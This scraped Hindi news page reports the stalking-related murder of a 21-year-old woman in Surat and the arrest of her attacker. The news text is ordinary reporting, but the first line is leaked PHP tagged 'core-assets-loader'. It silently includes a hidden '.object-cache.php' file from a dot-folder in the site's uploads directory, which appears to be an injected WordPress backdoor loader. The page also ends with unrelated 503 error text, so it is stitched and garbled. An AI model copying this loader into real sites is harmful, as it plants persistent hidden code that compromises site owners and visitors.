add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); सिरफिरे आशिक ने सरेआम लड़की का गला रेता:मिलने से मना किया तो मां-भाई के सामने की हत्या, चाचा को भी मारा चाकू – SOCH INDIA
Menu

अपराध समाचार
सिरफिरे आशिक ने सरेआम लड़की का गला रेता:मिलने से मना किया तो मां-भाई के सामने की हत्या, चाचा को भी मारा चाकू

nobanner

सूरत में एक सिरफिरे आशिक ने सरेआम 21 साल की युवती की गला रेत कर हत्या कर दी। घटना के वक्त मृतका की मां और भाई सामने ही थे। आरोपी ने मृतका के चाचा को भी चाकू घोंपकर घायल कर दिया। छात्रा के पिता के अफ्रीका से आने के बाद उसका अंतिम संस्कार कर दिया गया।

चाचा अस्पताल में भर्ती

सूरत जिले के पासोदरा गांव की 21 वर्षीय ग्रीष्मा वेकारिया का आज दो दिन बाद अंतिम संस्कार कर दिया गया। ग्रीष्मा के पिता अफीक्रा में थे और उनके आने तक उसका शव अस्पताल में रखा गया था। ग्रीष्मा की 12 फरवरी को सिरफिरे फेनिल गोयानी ने उसकी मां और भाई के सामने गला काटकर हत्या कर दी थी। ग्रीष्मा के चाचा ने रोकने की कोशिश की, तो उसने उनके पेट में भी चाकू मार दिया था। हालांकि वे अब खतरे से बाहर हैं।

एकतरफा प्यार में की हत्या

एकतरफा प्रेम में हुई इस नृशंस हत्या से पूरा गुजरात स्तब्ध है। उसकी अंतिम यात्रा में हजारों की तादाद में लोग शामिल हुए और आरोपी को फांसी देने की मांग की। जानकारी के मुताबिक, आरोपी फेनिल पिछले सालभर से ग्रीष्मा को परेशान कर रहा था और उसने एकतरफा प्यार में ही इस वारदात को अंजाम दिया।

छोटे भाई को भी घायल किया
शनिवार की शाम को करीब छह बजे ग्रीष्मा के चाचा ने गोयानी से कहा था कि वह ग्रीष्मा से दूर रहे। इसके बाद भी जब गोयानी ने ग्रीष्मा से मिलने की कोशिश की तो चाचा ने उसे पकड़ने की कोशिश की। इस पर फेनिल ने उनके पेट में चाकू घोंप दिया था। इसके बाद फेनिल ने दौड़कर ग्रीष्मा को पकड़ लिया और गर्दन पर चाकू रख दिया था। आरोपी ने ग्रीष्मा के छोटे भाई को भी घायल कर दिया था।

हत्या के बाद नस काटकर जान देने की कोशिश
वारदात के बाद आरोपी फेनिल मौके से भाग निकला और अपनी कलाई की नस काटकर खुद भी जान देने की कोशिश की। पुलिस के अनुसार उसने जहर भी खाया था। उसे हत्या और हत्या के प्रयास की धाराओं में गिरफ्तार कर लिया गया है। फिलहाल उसका एक अस्पताल में इलाज कराया जा रहा है।

स्कूल में ग्रीष्मा के साथ पढ़ता था आरोपी
आरोपी फेनिल गोयानी को पुलिस ने शनिवार को कामरेज इलाके से गिरफ्तार किया था। आरोपी फेनिल गोयानी और ग्रीष्मा दोनों स्कूल में साथ पढ़ा करते थे। पूछताछ में पता चला कि ग्रीष्मा ने फेनिल का प्रेम प्रस्ताव स्वीकार करने से इनकार कर दिया था। इसके बावजूद फेनिल करीब एक साल से उसे परेशान कर रहा था। फेनिल के खिलाफ कई बार शिकायत भी दर्ज करवाई गई। घर वालों के जरिए भी उसे समझाया गया था, लेकिन उस पर इसका कोई असर नहीं हुआ।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.